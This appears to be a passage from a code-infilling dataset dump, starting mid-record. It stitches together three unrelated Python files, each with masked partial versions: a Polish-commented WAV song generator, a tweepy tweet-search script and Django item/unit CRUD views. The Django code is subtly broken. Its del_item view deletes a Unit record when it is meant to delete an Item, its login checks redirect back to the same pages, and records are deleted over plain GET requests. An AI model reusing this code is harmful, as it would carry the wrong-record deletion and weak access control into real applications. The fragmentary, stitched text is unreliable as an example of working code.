else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-4": "<mask token>\nprint('Laduje modul o nazwie: ' + __name__)\nimport numpy as np\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\n axis=1) / 32767\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,\r\n \"zglasnianie utworu\")\r\n\"\"\"\r\n\r\n\r\nprint(\"Laduje modul o nazwie: \"+__name__)\r\n\r\nimport numpy as np\r\n\r\ndef wczytywanie_ustawien(plik_konfiguracyjny = \"defs.txt\"):\r\n \"\"\" \r\n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\r\n \r\n arg:\r\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \r\n wartosciami parametrow (tempo itd.)\r\n \r\n wyjscie:\r\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\r\n \r\n \"\"\"\r\n import re\r\n import numpy as np\r\n \r\n # wczytuje zawartosc pliku (bez pierwszej i ostatniej linijki, jeden wiersz \r\n # wyjsciowej macierzy, zawiera nazwe parametru i jego wartosc, jako \r\n # oddzielne elementy, zapisane jako stringi)\r\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \\\r\n skip_header=1, skip_footer=1, delimiter=\":\")\r\n \r\n # tworze slownik, ktory bedzie przechowywal wartosci\r\n parametry = {}\r\n \r\n # pozbywam się \"\" z key\r\n \r\n # jesli mamy 1 parametr (1 linijka w pliku, to ustawienia to zmienna o \r\n # shape = (2,), wiec odwoluje sie bezposrednio do zmiennej ustawienia\r\n if ustawienia.shape == (2,): \r\n parametry[re.sub('\"','',ustawienia[0])] = ustawienia[1]\r\n # jak mamy wiecej parametrow odwoluje sie do kolejnych linijek macierzy \r\n # ustawienia\r\n else:\r\n for l in ustawienia: \r\n parametry[re.sub('\"','',l[0])] = l[1]\r\n \r\n # zamieniamy napisy na odpowiednie wartosci - kontroluje te parametry, wiec\r\n # robie to recznie\r\n \r\n try:\r\n parametry['tryb'] = parametry['tryb'].strip() #tryb\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n print(\"Podaj tryb odczytu!\")\r\n try:\r\n parametry['bpm'] = int(parametry['bpm']) # tempo\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n parametry['freq'] = int(parametry['freq']) # frekwencja wyjsciowego wav\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n parametry['loud'] = float(parametry['loud'] ) # glosnosc\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n # lista wag dla sampli\r\n parametry['wages'] = [float(s) for s in parametry['wages'].split(\",\")] \r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n \r\n return parametry\r\n \r\n#b = wczytywanie_ustawien(\"defs.txt\")\r\n \r\n \r\n#zglasnianie utworu\r\n\r\ndef zmiana_glosnosci(utwor, procent = 0):\r\n \"\"\"\r\n zmienia glosnosc utworu (jego amplitudy)\r\n \r\n arg:\r\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \r\n lub zciszony\r\n \r\n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \r\n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \r\n glosniej\", dla -1 \"100% ciszej\"\r\n \r\n wyjscie:\r\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\r\n \"\"\"\r\n if(-1 <= procent <= 1):\r\n #ile razy mamy pomnozyc amplitude naszego dzwieku\r\n mnoznik = 0\r\n if( procent < 0 ):\r\n mnoznik = 1 + procent\r\n else:\r\n # obliczamy najwyzsza amplitude w danym utworze i ona bedzie \r\n # wyznaczac jak bardzo mozemy podglosnic\r\n maks_ampli = 0\r\n maks_ampli = max(abs(utwor))\r\n mnoznik = 32767/maks_ampli # maksymalny mnoznik\r\n # mnoznik minimalnie moze osiagnac wartosc 1, to co powyzej \r\n # (mnoznik-1) mnozymy o procent zglosnienia\r\n # i dodajemy do podstawy (czyli 1)\r\n mnoznik = 1 + (mnoznik - 1)*procent\r\n glosniej = mnoznik * utwor\r\n #glosniej = np.array(glosniej, dtype=np.int16)\r\n glosniej = glosniej.astype(np.int16) \r\n return glosniej\r\n else:\r\n print(\"Podaj procent z zakresu -1 do 1\")\r\n \r\n\r\n#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])\r\n#wierszyk1\r\n \r\n \r\n \r\n\r\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \\\r\n freq = 44100, wages = None, loud = 0):\r\n \"\"\"\r\n glowna funkcja generujaca cala piosenke\r\n \r\n arg:\r\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \r\n definicje kolejnych cwiercnut (co ma byc grane \r\n w danej cwiercnucie)\r\n \r\n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \r\n zapisana (nie jest, gdy tracki mialy nieodpowiednia \r\n liczbe wierszy lub kolumn)\r\n \r\n int: bpm - tempo piosenki w jednostce bpm\r\n \r\n int: freq - ilosc probek w jednej sekundzie\r\n \r\n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \r\n probka, 2 etc.)\r\n \r\n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \r\n maxa, -1 - sciszamy na maxa\r\n \r\n wyjscie:\r\n numpy.ndarray (numpy.int16): gotowy utwór\r\n \r\n \"\"\"\r\n \r\n \r\n # macierz piosenki byla pusta, piosenka nie zostala utworzona\r\n if(czy_pelna == False):\r\n print(\"Nie utworzono piosenki\")\r\n return None \r\n \r\n else:\r\n \r\n import numpy as np\r\n import scipy.io.wavfile\r\n \r\n t_cwiercnuty = 60 / bpm # czas trwania jednej cwiercnuty (zalezy od \r\n #tempa)\r\n ile_cwiercnut = macierz_piosenki.shape[0] # ilosc cwiercnut\r\n kanaly = macierz_piosenki.shape[1] # ilosc uzywanych sampli\r\n frekw = freq\r\n czas_utworu = ile_cwiercnut*t_cwiercnuty\r\n # ile elementow bedzie w nowym utworze\r\n ilosc_probek = int(frekw*czas_utworu) \r\n \r\n # bedziemy tylko raz wczytywac zawartosc sampleXY.wav, wiec potrzebuje \r\n # unikalne numery sampli\r\n rozne_sample = np.unique(macierz_piosenki) # bierze lacznie z \"--\"\r\n \r\n # w slownikach zapiszemy parametry tych sampli\r\n # slownik z wartosciami danego sampla (tj. macierze numpy-owe z \r\n # amplitudami)\r\n sample_co = {} \r\n sample_frekw = {} # slownik z ich frekwencjami\r\n sample_dl = {} # slownik z ich dlugosciami\r\n \r\n #wczytujemy te sample\r\n # w iteratorze bierzemy napisy \"01\" \"02\" \"--\" itd. stringi!!!\r\n for ktory_sampel in rozne_sample: \r\n \r\n if(ktory_sampel != '--'):\r\n # tworzymy napis z nazwa pliku sampla, np. \"sample01.wav\"\r\n plik = ''.join(['sample',ktory_sampel,'.wav'])\r\n # wczytujemy zawartosc i frekwencje danego sampla do \r\n # odpowiednio nazwanego elementu w slowniku sample_co i \r\n # sample_frekw\r\n sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \\\r\n scipy.io.wavfile.read(plik)\r\n # tworzymy mono z naszego sampla\r\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\\\r\n axis=1)/32767\r\n # normalizujemy te wartosci\r\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \\\r\n max(np.abs(sample_co[ktory_sampel])) * 32767)\r\n # zapisujemy dlugosc sampli, czyli ilosc probek \r\n # ( = czas_trwania*frekwencja)\r\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\r\n \r\n else: # to samo robimy dla \"--\" recznie ustawiamy\r\n # robimy cisze, gdy --\r\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16) \r\n sample_frekw[ktory_sampel] = frekw # taka sama jak domyslna\r\n sample_dl[ktory_sampel] = 0 # zakladamy czas 0 sekund\r\n \r\n\r\n \r\n \r\n \r\n if wages is None:\r\n wages = np.ones((1,kanaly)) \r\n else:\r\n # zeby mialo wymiar (1,kanaly), a nie (kanaly,)\r\n wages = np.array(wages).reshape(1,kanaly) \r\n \r\n # definicja nowego utworu\r\n T = np.linspace(0, czas_utworu, ilosc_probek)\r\n \r\n for wiersz in range(0, ile_cwiercnut):\r\n\r\n sample = [] # wczytamy sample z danej cwiecnuty\r\n dlugosci = [] # tu zapiszemy ich dlugosci w tej cwiercnucie\r\n\r\n for i in range(0, kanaly):\r\n \r\n sampus = macierz_piosenki[wiersz,i]\r\n sample.append(sample_co[sampus]) \r\n dlugosci.append(sample_dl[sampus])\r\n\r\n \r\n # bierzemy najdluzszy sample i w calosci bedziemy go odtwarzac; \r\n # reszte zatem tez w calosci odtworzymy, a gdy sie skoncza damy \r\n # cisze (zera)\r\n maksik = max(dlugosci)\r\n # mamy tutaj macierz 4 na max dlugosc, przygotowana do zlaczenia \r\n # potem tych dzwiekow w jeden \r\n pusty = np.int16(np.zeros((len(sample), maksik)))\r\n\r\n # dodajemy nasze dzwieki do tej pustej\r\n for k in range(0, kanaly):\r\n pusty[k][0:dlugosci[k]] = sample[k]\r\n\r\n \r\n # mnozymy kolejne elementy wektora pusty (czyli sample) przez \r\n # wagi i sumujemy\r\n cwiercnuta = np.dot(wages, pusty) \r\n #otrzymamy wymiar (1, x), a chcemy (x,), wiec bierzemy pierwszy \r\n # element\r\n cwiercnuta = cwiercnuta[0]\r\n \r\n # poczatek biezacej cwiercnuty \r\n poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)\r\n \r\n # jesli dodanie ostatnich cwiercnut bedzie wiazalo sie z \r\n # przekroczeniem dlugosci tworzonego utworu, obcinamy ostatnie \r\n # dzwieki, tak by zmiescic sie w tej dlugosci\r\n if (poczatek_cwiercnuty + maksik) > ilosc_probek:\r\n \r\n T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\\\r\n cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\\\r\n maksik)])]\r\n \r\n else:\r\n T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \\\r\n cwiercnuta\r\n \r\n T= np.array(T, dtype=np.int16)\r\n \r\n #ustalamy glosnosc utworu\r\n T = zmiana_glosnosci(T, loud)\r\n\r\n return T\r\n\r\n#pios, k = wczytywanie_sciezek(a)\r\n#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \\\r\n#wages = b['wages'])\r\n#wierszyk = tworzenie_piosenki(pios, k, **b)\r\n#wierszyk ",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import tweepy
import time
import twitter_credentials as TC
auth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)
auth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
count = 1
# Query to get 50 tweets with either Indiana or Weather in them
for tweet in tweepy.Cursor(api.search, q = "Indiana OR Weather").items(50):
print(str(count) +". "+ tweet.text)
count+=1
|
normal
|
{
"blob_id": "4da1a97c2144c9aaf96e5fe6508f8b4532b082d4",
"index": 7861,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\n<mask token>\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-3": "<mask token>\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\ncount = 1\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-4": "import tweepy\nimport time\nimport twitter_credentials as TC\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\ncount = 1\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-5": "import tweepy\nimport time\nimport twitter_credentials as TC\n\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\ncount = 1\n\n# Query to get 50 tweets with either Indiana or Weather in them\nfor tweet in tweepy.Cursor(api.search, q = \"Indiana OR Weather\").items(50):\n print(str(count) +\". \"+ tweet.text)\n count+=1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render, redirect
# Create your views here.
from item.models import Item, Unit
def str_to_bool(s):
return True if s.lower() == 'true' else False
def item(request):
if not request.session.get('is_login', None):
return redirect('/item/item')
else:
item_list = Item.objects.all()
return render(request, 'item/item.html', locals())
def add_item(request):
if request.method == 'GET':
last_item_info = Item.objects.last()
unit_list=Unit.objects.all()
return render(request, 'item/add_item.html', locals())
else:
item_index = request.POST.get('item_index')
item_chinese_name = request.POST.get('item_chinese_name')
item_english_name = request.POST.get('item_english_name')
item_method = request.POST.get('item_method')
item_unit = request.POST.get('item_unit')
is_calc = request.POST.get('is_calc')
is_use = request.POST.get('is_use')
unit_info=Unit.objects.get(id=item_unit)
new_item = Item(item_index=int(item_index), item_chinese_name=item_chinese_name,
item_english_name=item_english_name,item_method=item_method,item_unit=unit_info,is_calc=str_to_bool(is_calc),
is_use=str_to_bool(is_use))
new_item.save()
return redirect('/item/item/')
def edit_item(request):
if request.method == 'GET':
nid = request.GET.get('nid')
item_info = Item.objects.get(id=nid)
unit_list = Unit.objects.all()
return render(request, 'item/edit_item.html', locals())
else:
nid = request.GET.get('nid')
item_index = request.POST.get('item_index')
item_chinese_name = request.POST.get('item_chinese_name')
item_english_name = request.POST.get('item_english_name')
item_method = request.POST.get('item_method')
item_unit = request.POST.get('item_unit')
is_calc = request.POST.get('is_calc')
is_use = request.POST.get('is_use')
unit_info = Unit.objects.get(id=item_unit)
item_info = Item.objects.get(id=nid)
item_info.item_index = item_index
item_info.item_chinese_name = item_chinese_name
item_info.item_english_name = item_english_name
item_info.item_method = item_method
item_info.item_unit = unit_info
item_info.is_calc = str_to_bool(is_calc)
item_info.is_use = str_to_bool(is_use)
item_info.save()
return redirect('/item/item/')
def del_item(request):
nid = request.GET.get('nid')
item_info = Unit.objects.filter(id=nid)
item_info.delete()
return redirect('/item/item/')
def unit(request):
if not request.session.get('is_login', None):
return redirect('/item/unit')
else:
unit_list = Unit.objects.all()
return render(request, 'item/unit.html', locals())
def add_unit(request):
if request.method == 'GET':
last_unit_info = Unit.objects.last()
return render(request, 'item/add_unit.html', locals())
else:
unit_index = request.POST.get('unit_index')
unit_name = request.POST.get('unit_name')
new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name,)
new_unit.save()
return redirect('/item/unit/')
def edit_unit(request):
if request.method == 'GET':
nid = request.GET.get('nid')
unit_info = Unit.objects.get(id=nid)
return render(request, 'item/edit_unit.html', locals())
else:
nid = request.GET.get('nid')
unit_index = request.POST.get('unit_index')
unit_name = request.POST.get('unit_name')
unit_info = Unit.objects.get(id=nid)
unit_info.unit_index = unit_index
unit_info.unit_name = unit_name
unit_info.save()
return redirect('/item/unit/')
def del_unit(request):
nid = request.GET.get('nid')
unit_info = Unit.objects.filter(id=nid)
unit_info.delete()
return redirect('/item/unit/')
|
normal
|
{
"blob_id": "22b2ebdbb48caa593bece030d238089a0aa27053",
"index": 1983,
"step-1": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-2": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-3": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-4": "<mask token>\n\n\ndef str_to_bool(s):\n return True if s.lower() == 'true' else False\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\ndef add_item(request):\n if request.method == 'GET':\n last_item_info = Item.objects.last()\n unit_list = Unit.objects.all()\n return render(request, 'item/add_item.html', locals())\n else:\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n new_item = Item(item_index=int(item_index), item_chinese_name=\n item_chinese_name, item_english_name=item_english_name,\n item_method=item_method, item_unit=unit_info, is_calc=\n str_to_bool(is_calc), is_use=str_to_bool(is_use))\n new_item.save()\n return redirect('/item/item/')\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
